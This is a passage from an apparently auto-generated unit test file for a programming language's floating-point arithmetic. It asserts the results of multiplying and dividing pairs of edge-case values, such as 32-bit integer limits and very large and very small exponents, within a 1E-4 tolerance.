--assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-507" --assertf~= 0.0 ( -2147483648.0 * 0.0 ) 1E-4 --test-- "float-auto-508" fat-i: -2147483648.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-509" --assertf~= 4.61168601842739E+18 ( -2147483648.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-510" fat-i: -2147483648.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 4.61168601842739E+18 fat-k 1E-4 --test-- "float-auto-511" --assertf~= -4.6116860162799E+18 ( -2147483648.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-512" fat-i: -2147483648.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= -4.6116860162799E+18 fat-k 1E-4 --test-- "float-auto-513" --assertf~= 2147483648.0 ( -2147483648.0 * -1.0 ) 1E-4 --test-- "float-auto-514" fat-i: -2147483648.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-515" --assertf~= -6442450944.0 ( -2147483648.0 * 3.0 ) 1E-4 --test-- "float-auto-516" fat-i: -2147483648.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= -6442450944.0 fat-k 1E-4 --test-- "float-auto-517" --assertf~= 15032385536.0 ( -2147483648.0 * -7.0 ) 1E-4 --test-- "float-auto-518" fat-i: -2147483648.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 15032385536.0 fat-k 1E-4 --test-- "float-auto-519" --assertf~= -10737418240.0 ( -2147483648.0 * 5.0 ) 1E-4 --test-- "float-auto-520" fat-i: -2147483648.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= -10737418240.0 fat-k 1E-4 --test-- "float-auto-521" --assertf~= -265121435612086.0 ( -2147483648.0 * 123456.789 ) 1E-4 --test-- "float-auto-522" fat-i: -2147483648.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= -265121435612086.0 fat-k 1E-4 --test-- "float-auto-523" --assertf~= -2.62442031860888E+42 ( -2147483648.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-524" fat-i: -2147483648.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= -2.62442031860888E+42 fat-k 1E-4 --test-- "float-auto-525" --assertf~= -2.14748150051635E-35 ( -2147483648.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-526" fat-i: -2147483648.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= -2.14748150051635E-35 fat-k 1E-4 --test-- "float-auto-527" --assertf~= -1.65356240896E+28 ( -2147483648.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-528" fat-i: -2147483648.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= -1.65356240896E+28 fat-k 1E-4 --test-- "float-auto-529" --assertf~= 0.0 ( 2147483647.0 * 0.0 ) 1E-4 --test-- "float-auto-530" fat-i: 2147483647.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-531" --assertf~= -4.6116860162799E+18 ( 2147483647.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-532" fat-i: 2147483647.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -4.6116860162799E+18 fat-k 1E-4 --test-- "float-auto-533" --assertf~= 4.61168601413242E+18 ( 2147483647.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-534" fat-i: 2147483647.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 4.61168601413242E+18 fat-k 1E-4 --test-- "float-auto-535" --assertf~= -2147483647.0 ( 2147483647.0 * -1.0 ) 1E-4 --test-- "float-auto-536" fat-i: 2147483647.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-537" --assertf~= 6442450941.0 ( 2147483647.0 * 3.0 ) 1E-4 --test-- "float-auto-538" fat-i: 2147483647.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 6442450941.0 fat-k 1E-4 --test-- "float-auto-539" --assertf~= -15032385529.0 ( 2147483647.0 * -7.0 ) 1E-4 --test-- "float-auto-540" fat-i: 2147483647.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -15032385529.0 fat-k 1E-4 --test-- "float-auto-541" --assertf~= 10737418235.0 ( 2147483647.0 * 5.0 ) 1E-4 --test-- "float-auto-542" fat-i: 2147483647.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 10737418235.0 fat-k 1E-4 --test-- "float-auto-543" --assertf~= 265121435488630.0 ( 2147483647.0 * 123456.789 ) 1E-4 --test-- "float-auto-544" fat-i: 2147483647.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 265121435488630.0 fat-k 1E-4 --test-- "float-auto-545" --assertf~= 2.62442031738679E+42 ( 2147483647.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-546" fat-i: 2147483647.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 2.62442031738679E+42 fat-k 1E-4 --test-- "float-auto-547" --assertf~= 2.14748149951635E-35 ( 2147483647.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-548" fat-i: 2147483647.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 2.14748149951635E-35 fat-k 1E-4 --test-- "float-auto-549" --assertf~= 1.65356240819E+28 ( 2147483647.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-550" fat-i: 2147483647.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 1.65356240819E+28 fat-k 1E-4 --test-- "float-auto-551" --assertf~= 0.0 ( -1.0 * 0.0 ) 1E-4 --test-- "float-auto-552" fat-i: -1.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-553" --assertf~= 2147483648.0 ( -1.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-554" fat-i: -1.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 2147483648.0 fat-k 1E-4 --test-- "float-auto-555" --assertf~= -2147483647.0 ( -1.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-556" fat-i: -1.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= -2147483647.0 fat-k 1E-4 --test-- "float-auto-557" --assertf~= 1.0 ( -1.0 * -1.0 ) 1E-4 --test-- "float-auto-558" fat-i: -1.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 1.0 fat-k 1E-4 --test-- "float-auto-559" --assertf~= -3.0 ( -1.0 * 3.0 ) 1E-4 --test-- "float-auto-560" fat-i: -1.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-561" --assertf~= 7.0 ( -1.0 * -7.0 ) 1E-4 --test-- "float-auto-562" fat-i: -1.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-563" --assertf~= -5.0 ( -1.0 * 5.0 ) 1E-4 --test-- "float-auto-564" fat-i: -1.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-565" --assertf~= -123456.789 ( -1.0 * 123456.789 ) 1E-4 --test-- "float-auto-566" fat-i: -1.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-567" --assertf~= -1.222090944E+33 ( -1.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-568" fat-i: -1.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-569" --assertf~= -9.99999E-45 ( -1.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-570" fat-i: -1.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-571" --assertf~= -7.7E+18 ( -1.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-572" fat-i: -1.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-573" --assertf~= 0.0 ( 3.0 * 0.0 ) 1E-4 --test-- "float-auto-574" fat-i: 3.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-575" --assertf~= -6442450944.0 ( 3.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-576" fat-i: 3.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -6442450944.0 fat-k 1E-4 --test-- "float-auto-577" --assertf~= 6442450941.0 ( 3.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-578" fat-i: 3.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 6442450941.0 fat-k 1E-4 --test-- "float-auto-579" --assertf~= -3.0 ( 3.0 * -1.0 ) 1E-4 --test-- "float-auto-580" fat-i: 3.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -3.0 fat-k 1E-4 --test-- "float-auto-581" --assertf~= 9.0 ( 3.0 * 3.0 ) 1E-4 --test-- "float-auto-582" fat-i: 3.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 9.0 fat-k 1E-4 --test-- "float-auto-583" --assertf~= -21.0 ( 3.0 * -7.0 ) 1E-4 --test-- "float-auto-584" fat-i: 3.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -21.0 fat-k 1E-4 --test-- "float-auto-585" --assertf~= 15.0 ( 3.0 * 5.0 ) 1E-4 --test-- "float-auto-586" fat-i: 3.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 15.0 fat-k 1E-4 --test-- "float-auto-587" --assertf~= 370370.367 ( 3.0 * 123456.789 ) 1E-4 --test-- "float-auto-588" fat-i: 3.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 370370.367 fat-k 1E-4 --test-- "float-auto-589" --assertf~= 3.666272832E+33 ( 3.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-590" fat-i: 3.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 3.666272832E+33 fat-k 1E-4 --test-- "float-auto-591" --assertf~= 2.999997E-44 ( 3.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-592" fat-i: 3.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 2.999997E-44 fat-k 1E-4 --test-- "float-auto-593" --assertf~= 2.31E+19 ( 3.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-594" fat-i: 3.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 2.31E+19 fat-k 1E-4 --test-- "float-auto-595" --assertf~= 0.0 ( -7.0 * 0.0 ) 1E-4 --test-- "float-auto-596" fat-i: -7.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-597" --assertf~= 15032385536.0 ( -7.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-598" fat-i: -7.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= 15032385536.0 fat-k 1E-4 --test-- "float-auto-599" --assertf~= -15032385529.0 ( -7.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-600" fat-i: -7.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= -15032385529.0 fat-k 1E-4 --test-- "float-auto-601" --assertf~= 7.0 ( -7.0 * -1.0 ) 1E-4 --test-- "float-auto-602" fat-i: -7.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= 7.0 fat-k 1E-4 --test-- "float-auto-603" --assertf~= -21.0 ( -7.0 * 3.0 ) 1E-4 --test-- "float-auto-604" fat-i: -7.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= -21.0 fat-k 1E-4 --test-- "float-auto-605" --assertf~= 49.0 ( -7.0 * -7.0 ) 1E-4 --test-- "float-auto-606" fat-i: -7.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= 49.0 fat-k 1E-4 --test-- "float-auto-607" --assertf~= -35.0 ( -7.0 * 5.0 ) 1E-4 --test-- "float-auto-608" fat-i: -7.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= -35.0 fat-k 1E-4 --test-- "float-auto-609" --assertf~= -864197.523 ( -7.0 * 123456.789 ) 1E-4 --test-- "float-auto-610" fat-i: -7.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= -864197.523 fat-k 1E-4 --test-- "float-auto-611" --assertf~= -8.554636608E+33 ( -7.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-612" fat-i: -7.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= -8.554636608E+33 fat-k 1E-4 --test-- "float-auto-613" --assertf~= -6.999993E-44 ( -7.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-614" fat-i: -7.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= -6.999993E-44 fat-k 1E-4 --test-- "float-auto-615" --assertf~= -5.39E+19 ( -7.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-616" fat-i: -7.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= -5.39E+19 fat-k 1E-4 --test-- "float-auto-617" --assertf~= 0.0 ( 5.0 * 0.0 ) 1E-4 --test-- "float-auto-618" fat-i: 5.0 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-619" --assertf~= -10737418240.0 ( 5.0 * -2147483648.0 ) 1E-4 --test-- "float-auto-620" fat-i: 5.0 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -10737418240.0 fat-k 1E-4 --test-- "float-auto-621" --assertf~= 10737418235.0 ( 5.0 * 2147483647.0 ) 1E-4 --test-- "float-auto-622" fat-i: 5.0 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 10737418235.0 fat-k 1E-4 --test-- "float-auto-623" --assertf~= -5.0 ( 5.0 * -1.0 ) 1E-4 --test-- "float-auto-624" fat-i: 5.0 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -5.0 fat-k 1E-4 --test-- "float-auto-625" --assertf~= 15.0 ( 5.0 * 3.0 ) 1E-4 --test-- "float-auto-626" fat-i: 5.0 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 15.0 fat-k 1E-4 --test-- "float-auto-627" --assertf~= -35.0 ( 5.0 * -7.0 ) 1E-4 --test-- "float-auto-628" fat-i: 5.0 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -35.0 fat-k 1E-4 --test-- "float-auto-629" --assertf~= 25.0 ( 5.0 * 5.0 ) 1E-4 --test-- "float-auto-630" fat-i: 5.0 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 25.0 fat-k 1E-4 --test-- "float-auto-631" --assertf~= 617283.945 ( 5.0 * 123456.789 ) 1E-4 --test-- "float-auto-632" fat-i: 5.0 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 617283.945 fat-k 1E-4 --test-- "float-auto-633" --assertf~= 6.11045472E+33 ( 5.0 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-634" fat-i: 5.0 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 6.11045472E+33 fat-k 1E-4 --test-- "float-auto-635" --assertf~= 4.999995E-44 ( 5.0 * 9.99999E-45 ) 1E-4 --test-- "float-auto-636" fat-i: 5.0 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 4.999995E-44 fat-k 1E-4 --test-- "float-auto-637" --assertf~= 3.85E+19 ( 5.0 * 7.7E+18 ) 1E-4 --test-- "float-auto-638" fat-i: 5.0 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 3.85E+19 fat-k 1E-4 --test-- "float-auto-639" --assertf~= 0.0 ( 123456.789 * 0.0 ) 1E-4 --test-- "float-auto-640" fat-i: 123456.789 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-641" --assertf~= -265121435612086.0 ( 123456.789 * -2147483648.0 ) 1E-4 --test-- "float-auto-642" fat-i: 123456.789 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -265121435612086.0 fat-k 1E-4 --test-- "float-auto-643" --assertf~= 265121435488630.0 ( 123456.789 * 2147483647.0 ) 1E-4 --test-- "float-auto-644" fat-i: 123456.789 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 265121435488630.0 fat-k 1E-4 --test-- "float-auto-645" --assertf~= -123456.789 ( 123456.789 * -1.0 ) 1E-4 --test-- "float-auto-646" fat-i: 123456.789 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -123456.789 fat-k 1E-4 --test-- "float-auto-647" --assertf~= 370370.367 ( 123456.789 * 3.0 ) 1E-4 --test-- "float-auto-648" fat-i: 123456.789 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 370370.367 fat-k 1E-4 --test-- "float-auto-649" --assertf~= -864197.523 ( 123456.789 * -7.0 ) 1E-4 --test-- "float-auto-650" fat-i: 123456.789 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -864197.523 fat-k 1E-4 --test-- "float-auto-651" --assertf~= 617283.945 ( 123456.789 * 5.0 ) 1E-4 --test-- "float-auto-652" fat-i: 123456.789 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 617283.945 fat-k 1E-4 --test-- "float-auto-653" --assertf~= 15241578750.1905 ( 123456.789 * 123456.789 ) 1E-4 --test-- "float-auto-654" fat-i: 123456.789 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 15241578750.1905 fat-k 1E-4 --test-- "float-auto-655" --assertf~= 1.50875423812219E+38 ( 123456.789 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-656" fat-i: 123456.789 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 1.50875423812219E+38 fat-k 1E-4 --test-- "float-auto-657" --assertf~= 1.23456665543211E-39 ( 123456.789 * 9.99999E-45 ) 1E-4 --test-- "float-auto-658" fat-i: 123456.789 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 1.23456665543211E-39 fat-k 1E-4 --test-- "float-auto-659" --assertf~= 9.506172753E+23 ( 123456.789 * 7.7E+18 ) 1E-4 --test-- "float-auto-660" fat-i: 123456.789 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 9.506172753E+23 fat-k 1E-4 --test-- "float-auto-661" --assertf~= 0.0 ( 1.222090944E+33 * 0.0 ) 1E-4 --test-- "float-auto-662" fat-i: 1.222090944E+33 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-663" --assertf~= -2.62442031860888E+42 ( 1.222090944E+33 * -2147483648.0 ) 1E-4 --test-- "float-auto-664" fat-i: 1.222090944E+33 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -2.62442031860888E+42 fat-k 1E-4 --test-- "float-auto-665" --assertf~= 2.62442031738679E+42 ( 1.222090944E+33 * 2147483647.0 ) 1E-4 --test-- "float-auto-666" fat-i: 1.222090944E+33 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 2.62442031738679E+42 fat-k 1E-4 --test-- "float-auto-667" --assertf~= -1.222090944E+33 ( 1.222090944E+33 * -1.0 ) 1E-4 --test-- "float-auto-668" fat-i: 1.222090944E+33 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -1.222090944E+33 fat-k 1E-4 --test-- "float-auto-669" --assertf~= 3.666272832E+33 ( 1.222090944E+33 * 3.0 ) 1E-4 --test-- "float-auto-670" fat-i: 1.222090944E+33 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 3.666272832E+33 fat-k 1E-4 --test-- "float-auto-671" --assertf~= -8.554636608E+33 ( 1.222090944E+33 * -7.0 ) 1E-4 --test-- "float-auto-672" fat-i: 1.222090944E+33 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -8.554636608E+33 fat-k 1E-4 --test-- "float-auto-673" --assertf~= 6.11045472E+33 ( 1.222090944E+33 * 5.0 ) 1E-4 --test-- "float-auto-674" fat-i: 1.222090944E+33 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 6.11045472E+33 fat-k 1E-4 --test-- "float-auto-675" --assertf~= 1.50875423812219E+38 ( 1.222090944E+33 * 123456.789 ) 1E-4 --test-- "float-auto-676" fat-i: 1.222090944E+33 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 1.50875423812219E+38 fat-k 1E-4 --test-- "float-auto-677" --assertf~= 1.49350627540681E+66 ( 1.222090944E+33 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-678" fat-i: 1.222090944E+33 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 1.49350627540681E+66 fat-k 1E-4 --test-- "float-auto-679" --assertf~= 1.22208972190906E-11 ( 1.222090944E+33 * 9.99999E-45 ) 1E-4 --test-- "float-auto-680" fat-i: 1.222090944E+33 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 1.22208972190906E-11 fat-k 1E-4 --test-- "float-auto-681" --assertf~= 9.4101002688E+51 ( 1.222090944E+33 * 7.7E+18 ) 1E-4 --test-- "float-auto-682" fat-i: 1.222090944E+33 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 9.4101002688E+51 fat-k 1E-4 --test-- "float-auto-683" --assertf~= 0.0 ( 9.99999E-45 * 0.0 ) 1E-4 --test-- "float-auto-684" fat-i: 9.99999E-45 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-685" --assertf~= -2.14748150051635E-35 ( 9.99999E-45 * -2147483648.0 ) 1E-4 --test-- "float-auto-686" fat-i: 9.99999E-45 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -2.14748150051635E-35 fat-k 1E-4 --test-- "float-auto-687" --assertf~= 2.14748149951635E-35 ( 9.99999E-45 * 2147483647.0 ) 1E-4 --test-- "float-auto-688" fat-i: 9.99999E-45 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 2.14748149951635E-35 fat-k 1E-4 --test-- "float-auto-689" --assertf~= -9.99999E-45 ( 9.99999E-45 * -1.0 ) 1E-4 --test-- "float-auto-690" fat-i: 9.99999E-45 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -9.99999E-45 fat-k 1E-4 --test-- "float-auto-691" --assertf~= 2.999997E-44 ( 9.99999E-45 * 3.0 ) 1E-4 --test-- "float-auto-692" fat-i: 9.99999E-45 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 2.999997E-44 fat-k 1E-4 --test-- "float-auto-693" --assertf~= -6.999993E-44 ( 9.99999E-45 * -7.0 ) 1E-4 --test-- "float-auto-694" fat-i: 9.99999E-45 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -6.999993E-44 fat-k 1E-4 --test-- "float-auto-695" --assertf~= 4.999995E-44 ( 9.99999E-45 * 5.0 ) 1E-4 --test-- "float-auto-696" fat-i: 9.99999E-45 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 4.999995E-44 fat-k 1E-4 --test-- "float-auto-697" --assertf~= 1.23456665543211E-39 ( 9.99999E-45 * 123456.789 ) 1E-4 --test-- "float-auto-698" fat-i: 9.99999E-45 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 1.23456665543211E-39 fat-k 1E-4 --test-- "float-auto-699" --assertf~= 1.22208972190906E-11 ( 9.99999E-45 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-700" fat-i: 9.99999E-45 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 1.22208972190906E-11 fat-k 1E-4 --test-- "float-auto-701" --assertf~= 9.99998000001E-89 ( 9.99999E-45 * 9.99999E-45 ) 1E-4 --test-- "float-auto-702" fat-i: 9.99999E-45 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 9.99998000001E-89 fat-k 1E-4 --test-- "float-auto-703" --assertf~= 7.6999923E-26 ( 9.99999E-45 * 7.7E+18 ) 1E-4 --test-- "float-auto-704" fat-i: 9.99999E-45 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 7.6999923E-26 fat-k 1E-4 --test-- "float-auto-705" --assertf~= 0.0 ( 7.7E+18 * 0.0 ) 1E-4 --test-- "float-auto-706" fat-i: 7.7E+18 fat-j: 0.0 fat-k: fat-i * fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-707" --assertf~= -1.65356240896E+28 ( 7.7E+18 * -2147483648.0 ) 1E-4 --test-- "float-auto-708" fat-i: 7.7E+18 fat-j: -2147483648.0 fat-k: fat-i * fat-j --assertf~= -1.65356240896E+28 fat-k 1E-4 --test-- "float-auto-709" --assertf~= 1.65356240819E+28 ( 7.7E+18 * 2147483647.0 ) 1E-4 --test-- "float-auto-710" fat-i: 7.7E+18 fat-j: 2147483647.0 fat-k: fat-i * fat-j --assertf~= 1.65356240819E+28 fat-k 1E-4 --test-- "float-auto-711" --assertf~= -7.7E+18 ( 7.7E+18 * -1.0 ) 1E-4 --test-- "float-auto-712" fat-i: 7.7E+18 fat-j: -1.0 fat-k: fat-i * fat-j --assertf~= -7.7E+18 fat-k 1E-4 --test-- "float-auto-713" --assertf~= 2.31E+19 ( 7.7E+18 * 3.0 ) 1E-4 --test-- "float-auto-714" fat-i: 7.7E+18 fat-j: 3.0 fat-k: fat-i * fat-j --assertf~= 2.31E+19 fat-k 1E-4 --test-- "float-auto-715" --assertf~= -5.39E+19 ( 7.7E+18 * -7.0 ) 1E-4 --test-- "float-auto-716" fat-i: 7.7E+18 fat-j: -7.0 fat-k: fat-i * fat-j --assertf~= -5.39E+19 fat-k 1E-4 --test-- "float-auto-717" --assertf~= 3.85E+19 ( 7.7E+18 * 5.0 ) 1E-4 --test-- "float-auto-718" fat-i: 7.7E+18 fat-j: 5.0 fat-k: fat-i * fat-j --assertf~= 3.85E+19 fat-k 1E-4 --test-- "float-auto-719" --assertf~= 9.506172753E+23 ( 7.7E+18 * 123456.789 ) 1E-4 --test-- "float-auto-720" fat-i: 7.7E+18 fat-j: 123456.789 fat-k: fat-i * fat-j --assertf~= 9.506172753E+23 fat-k 1E-4 --test-- "float-auto-721" --assertf~= 9.4101002688E+51 ( 7.7E+18 * 1.222090944E+33 ) 1E-4 --test-- "float-auto-722" fat-i: 7.7E+18 fat-j: 1.222090944E+33 fat-k: fat-i * fat-j --assertf~= 9.4101002688E+51 fat-k 1E-4 --test-- "float-auto-723" --assertf~= 7.6999923E-26 ( 7.7E+18 * 9.99999E-45 ) 1E-4 --test-- "float-auto-724" fat-i: 7.7E+18 fat-j: 9.99999E-45 fat-k: fat-i * fat-j --assertf~= 7.6999923E-26 fat-k 1E-4 --test-- "float-auto-725" --assertf~= 5.929E+37 ( 7.7E+18 * 7.7E+18 ) 1E-4 --test-- "float-auto-726" fat-i: 7.7E+18 fat-j: 7.7E+18 fat-k: fat-i * fat-j --assertf~= 5.929E+37 fat-k 1E-4 --test-- "float-auto-727" --assertf~= 0.0 ( 0.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-728" fat-i: 0.0 fat-j: -2147483648.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-729" --assertf~= 0.0 ( 0.0 / 2147483647.0 ) 1E-4 --test-- "float-auto-730" fat-i: 0.0 fat-j: 2147483647.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-731" --assertf~= 0.0 ( 0.0 / -1.0 ) 1E-4 --test-- "float-auto-732" fat-i: 0.0 fat-j: -1.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-733" --assertf~= 0.0 ( 0.0 / 3.0 ) 1E-4 --test-- "float-auto-734" fat-i: 0.0 fat-j: 3.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-735" --assertf~= 0.0 ( 0.0 / -7.0 ) 1E-4 --test-- "float-auto-736" fat-i: 0.0 fat-j: -7.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-737" --assertf~= 0.0 ( 0.0 / 5.0 ) 1E-4 --test-- "float-auto-738" fat-i: 0.0 fat-j: 5.0 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-739" --assertf~= 0.0 ( 0.0 / 123456.789 ) 1E-4 --test-- "float-auto-740" fat-i: 0.0 fat-j: 123456.789 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-741" --assertf~= 0.0 ( 0.0 / 1.222090944E+33 ) 1E-4 --test-- "float-auto-742" fat-i: 0.0 fat-j: 1.222090944E+33 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-743" --assertf~= 0.0 ( 0.0 / 9.99999E-45 ) 1E-4 --test-- "float-auto-744" fat-i: 0.0 fat-j: 9.99999E-45 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-745" --assertf~= 0.0 ( 0.0 / 7.7E+18 ) 1E-4 --test-- "float-auto-746" fat-i: 0.0 fat-j: 7.7E+18 fat-k: fat-i / fat-j --assertf~= 0.0 fat-k 1E-4 --test-- "float-auto-747" --assertf~= 1.0 ( -2147483648.0 / -2147483648.0 ) 1E-4 --test-- "float-auto-748" fat-i: -2147483648.0 fat-j: 